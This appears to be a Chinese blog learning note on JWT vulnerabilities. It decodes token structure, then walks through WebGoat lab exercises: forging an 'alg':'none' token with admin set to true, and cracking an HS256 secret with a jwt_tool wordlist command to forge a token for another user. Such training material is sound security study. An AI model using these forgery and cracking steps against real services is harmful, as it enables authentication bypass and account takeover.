2. 程式人生 > 實用技巧 >JWT漏洞學習

JWT漏洞學習

阿新 發佈:2020-11-16

JWT漏洞學習

什麼是JWT?

JWT是JSON Web Token的縮寫,它是一串帶有宣告資訊的字串,由服務端使用加密演算法對資訊簽名,以保證其完整性和不可偽造性。Token裡可以包含所有必要的資訊,這樣服務端就無需儲存任何關於使用者或會話的資訊了。JWT可用於身份認證,會話狀態維持以及資訊交換等任務。

JSON Web令牌結構是什麼?

JWT由三部分構成,分別稱為header,payload和signature,各部分用“.”相連構成一個完整的Token,形如xxxxx.yyyyy.zzzzz

下面一張圖明確顯示了該結構:

令牌是base64編碼的,由三部分組成header.claims.signature

。該令牌的解碼版本為:

{
  "alg":"HS256",
  "typ":"JWT"
}
.
{
  "exp": 1416471934,
  "user_name": "user",
  "scope": [
    "read",
    "write"
  ],
  "authorities": [
    "ROLE_ADMIN",
    "ROLE_USER"
  ],
  "jti": "9bc92a44-0b1a-4c5e-be70-da52075b9a84",
  "client_id": "my-client-with-secret"
}
.
qxNjYSPIKSURZEMqLQQPw1Zdk6Le2FdGHRYZG7SQnNk

令牌資料解碼

由於Header和Payload部分是使用可逆base64方法編碼的,因此任何能夠看到令牌的人都可以讀取資料。
要讀取內容,您只需要將每個部分傳遞給base64解碼函式,以下是一些示例:

Linux base64工具(帶有-d標誌用於解碼):

$ echo eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9 | base64 -d
 {"typ":"JWT","alg":"HS256"}

瀏覽器JavaScript控制檯:

>> atob("eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9")
 "{"typ":"JWT","alg":"HS256"}"

Powershell:

PS C:\> [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64Strin
g("eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9"))
{"typ":"JWT","alg":"HS256"}

Pyhton:

>>> import base64
>>> print(base64.b64decode('eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9'))
{"typ":"JWT","alg":"HS256"}

靶場練習

靶場下載

實驗使用靶場:WEBGOAT

https://github.com/WebGoat/WebGoat/releases/download/v8.0.0.M17/webgoat-server-8.0.0.M17.jar

如何執行:

java -jar webgoat-server-8.0.0.M17.jar

訪問http://localhost:8080/WebGoat/即可。

特徵識別

首先我們需要識別應用程式正在使用JWT,最簡單的方法是在代理工具的歷史記錄中搜索JWT正則表示式:

[= ]ey[A-Za-z0-9_-]*\.[A-Za-z0-9._-]*         -網址安全的JWT版本
[= ]ey[A-Za-z0-9_\/+-]*\.[A-Za-z0-9._\/+-]*   -所有JWT版本(可能誤報)

以burpsuite舉例,在Proxy-HTTP history-File by search term中填入上訴正則表示式,切記勾選“區分大小寫”和“正則表示式”選項:

靶場實驗

Page4

GET /WebGoat/JWT/votings HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://localhost:8080/WebGoat/start.mvc
Cookie: access_token=eyJhbGciOiJIUzUxMiJ9.eyJpYXQiOjE2MDYzNTgwNzAsImFkbWluIjoiZmFsc2UiLCJ1c2VyIjoiVG9tIn0.uuxUOl2GoZaVEY8TsKJte0adKMGVd5Eywu3ys-nNIetgg0vfPLC68mMoat-Pp9z20it0AzFfEEEy2YgIZXJKEg; JSESSIONID=6C55033D91301896A8FAB9BA824DDDDC
X-Forwarded-For: 127.0.0.1

token:

eyJhbGciOiJIUzUxMiJ9.eyJpYXQiOjE2MDYzNTgwNzAsImFkbWluIjoiZmFsc2UiLCJ1c2VyIjoiVG9tIn0.uuxUOl2GoZaVEY8TsKJte0adKMGVd5Eywu3ys-nNIetgg0vfPLC68mMoat-Pp9z20it0AzFfEEEy2YgIZXJKEg

解碼:

Headers = {
  "alg": "HS512"
}

Payload = {
  "iat": 1606358070,
  "admin": "false",
  "user": "Tom"
}

Signature = "uuxUOl2GoZaVEY8TsKJte0adKMGVd5Eywu3ys-nNIetgg0vfPLC68mMoat-Pp9z20it0AzFfEEEy2YgIZXJKEg"

使用JWT_TOOL進行漏洞檢測

顯示存在"alg":"none"

更改Headers 中"alg"為none,Payload中"admin"為true.

注:https://jwt.io/ 該平臺不能把alg更改為none,有些師傅使用該平臺得到tokne也是神了,可以使用burpsuite中的Decoder模組,麻煩模仿別人部落格的師傅自己實驗一下好吧。

Page5

eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJXZWJHb2F0IFRva2VuIEJ1aWxkZXIiLCJpYXQiOjE1MjQyMTA5MDQsImV4cCI6MTYxODkwNTMwNCwiYXVkIjoid2ViZ29hdC5vcmciLCJzdWIiOiJ0b21Ad2ViZ29hdC5jb20iLCJ1c2VybmFtZSI6IlRvbSIsIkVtYWlsIjoidG9tQHdlYmdvYXQuY29tIiwiUm9sZSI6WyJNYW5hZ2VyIiwiUHJvamVjdCBBZG1pbmlzdHJhdG9yIl19.m-jSyfYEsVzD3CBI6N39wZ7AcdKdp_GiO7F_Ym12u-0

base64解碼後的令牌

{
"typ":"JWT",
"alg":"HS256"
}
.
{
"iss":"WebGoat Token Builder",
"iat":1524210904,
"exp":1618905304,
"aud":"webgoat.org",
"sub":"[email protected]",
"username":"Tom",
"Email":"[email protected]",
"Role":[
"Manager",
"Project Administrator"]
}
.
m-jSyfYEsVzD3CBI6N39wZ7AcdKdp_GiO7F_Ym12u-0

使用JWT_TOOL跑金鑰。

python3 jwt_tool.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJXZWJHb2F0IFRva2VuIEJ1aWxkZXIiLCJpYXQiOjE1MjQyMTA5MDQsImV4cCI6MTYxODkwNTMwNCwiYXVkIjoid2ViZ29hdC5vcmciLCJzdWIiOiJ0b21Ad2ViZ29hdC5jb20iLCJ1c2VybmFtZSI6IlRvbSIsIkVtYWlsIjoidG9tQHdlYmdvYXQuY29tIiwiUm9sZSI6WyJNYW5hZ2VyIiwiUHJvamVjdCBBZG1pbmlzdHJhdG9yIl19.m-jSyfYEsVzD3CBI6N39wZ7AcdKdp_GiO7F_Ym12u-0 -C -d 20k.txt

然後更改Payload中“username”為WebGoat,使用破解的金鑰victory生成新的token。

相關資料

https://www.cnblogs.com/yh-ma/p/10271720.html

https://www.cnblogs.com/xiaozi/p/12031111.html

https://www.cnblogs.com/xiaozi/p/12005929.html

https://emtunc.org/blog/11/2017/jwt-refresh-token-manipulation/

https://www.freebuf.com/vuls/211842.html

https://jwt.io/

相關推薦

JWT漏洞學習

JWT漏洞學習 什麼是JWTJWT是JSON WebToken的縮寫,它是一串帶有宣告資訊的字串,由服務端使用加密演算法對資訊簽名,以保證其完整性和不可偽造性。Token裡可以包含所有必要的資訊,這樣服務端就無需儲存任何關於使

Week1--漏洞學習

來源於天問之路知識星球的每日安全推送。 ASAN檢測不到的bugs 文章連結: https://nandynarwhals.org/bugs-asan-doesnt-detect/

漏洞學習記錄

CATALOG 1.Elasticsearch未授權漏洞2.ZooKeeper 未授權訪問漏洞3.Memcache未授權訪問4.docker未授權漏洞利用

Windows漏洞學習筆記-007-堆溢位的利用

堆溢位的利用 宣告:實驗環境為 Windows 2000 本文來源:Moeomu的部落格 連結串列的拆卸

Windows漏洞學習筆記-006-堆的入門

Windows的堆,從來都是一個亂糟糟的地方,管理方法也非常奇怪 宣告:實驗環境為 Windows 2000

Windows漏洞學習筆記-009-Windows異常的深入

深入挖掘Windows異常處理,附帶一些其它的利用方法 宣告:實驗環境為 Windows XP SP3

CVE-2020-16898 "Bad Neighbor " Windows TCP/IP遠端程式碼執行漏洞學習

  一、該漏洞和router advertisement相關,先來學習一下相關協議;   IPV4時代,如果想探測其他主機是否存活,要麼用ARP(一般是局域內網),要麼用ICMP(一般是公網)。但是在IPV6時代改用了Neighbor Discovery Pro

漏洞學習筆記-019-利用HeapSpray攻擊ASLR

利用Heap Spray(堆噴射)技術來攻擊ASLR並定位shellcode 本文來源:Moeomu的部落格 原理

漏洞學習筆記-018-利用部分覆蓋定位

利用部分覆蓋定位shellcode 本文來源:Moeomu的部落格 原理 映像隨機化指示對映像載入基址的全兩個位元組隨機化處理,這樣做的後果是跳板始終可用,因此可以利用這一點去繞過ASLR

漏洞學習筆記-017-ASLR簡介

ASLR技術的介紹和簡單攻擊思路 本文來源:Moeomu的部落格 ASLR技術簡介 縱觀前面介紹的所有漏洞利用方法都有著一個共同的特徵:都需要確定一個明確的跳轉地址。無論是JMP ESP等通用跳板指令還是Ret2Libc使用的各指

漏洞學習筆記-016-利用可執行記憶體和.NET攻擊DEP

Ret2Libc之利用VirtualProtect和VirtualAlloc攻擊DEP攻擊DEP 本文來源:Moeomu的部落格 利用可執行記憶體攻擊DEP

漏洞學習筆記-015-利用VirtualProtect和VirtualAlloc攻擊DEP

Ret2Libc之利用VirtualProtect和VirtualAlloc攻擊DEP攻擊DEP 本文來源:Moeomu的部落格 利用VirtualProtect攻擊DEP

漏洞學習筆記-014-DEP的介紹

Windows的DEP保護和簡單的攻擊方法 本文來源:Moeomu的部落格 DEP的介紹 溢位攻擊的根源是未準確區分資料和程式碼,但是重新設計計算機結構是不太可能的事情,所以使用各種辦法去減緩溢位攻擊

漏洞學習筆記-013-SafeSEH簡介和簡單攻擊

SafeSEH簡介和簡單攻擊 本文來源:Moeomu的部落格 SafeSEH簡介 工作 檢查異常處理鏈是否位於當前程式的棧中。如果不在當前棧中,程式將終止異常處理函式的呼叫。

漏洞學習筆記-020-SEHOP簡介

SEHOP的介紹和一點簡單攻擊 本文來源:Moeomu的部落格 簡介 SEHOP的核心任務就是檢查S.E.H鏈的完整性,在程式轉入異常處理前SEHOP會檢查S.E.H鏈上最後一個異常處理函式是否為系統固定的終極異常處理函式。如果是,

Python 反序列化漏洞學習筆記

參考文章 一篇文章帶你理解漏洞之 Python 反序列化漏洞 Python Pickle/CPickle 反序列化漏洞

CSRF漏洞學習

技術標籤:java安全web資料庫python CSRF漏洞原理 web應用程式在使用者進行敏感操作時,如修改賬號密碼,新增賬號,轉賬等,沒有校驗表單token或者http請求頭中的referer值,從而導致惡意攻擊者利用被攻擊者的身份完

ThinkPHP5.x注入漏洞學習

ThinkPHP5.x注入漏洞學習 前言 以下復現均需要在application/database.php 檔案中配置資料庫相關資訊,並開啟 **application/config 中的 ** app_debug 和 app_trace

SpEL表示式注入漏洞學習和回顯poc研究

主要記載一下SpEL表示式的學習和研究筆記,主要是發現了一個不受限制的回顯表示式,完善了一下基於nio做檔案讀寫的表示式,直接看poc可以跳轉到文章最後。

基於pikachu的漏洞學習(三)完結

命令執行&&程式碼執行 原理也是之前說過n次的,觀察下面的輸入 這是一個ping IP的介面,我們結束一個命令,新增一個命令,&&作為分隔符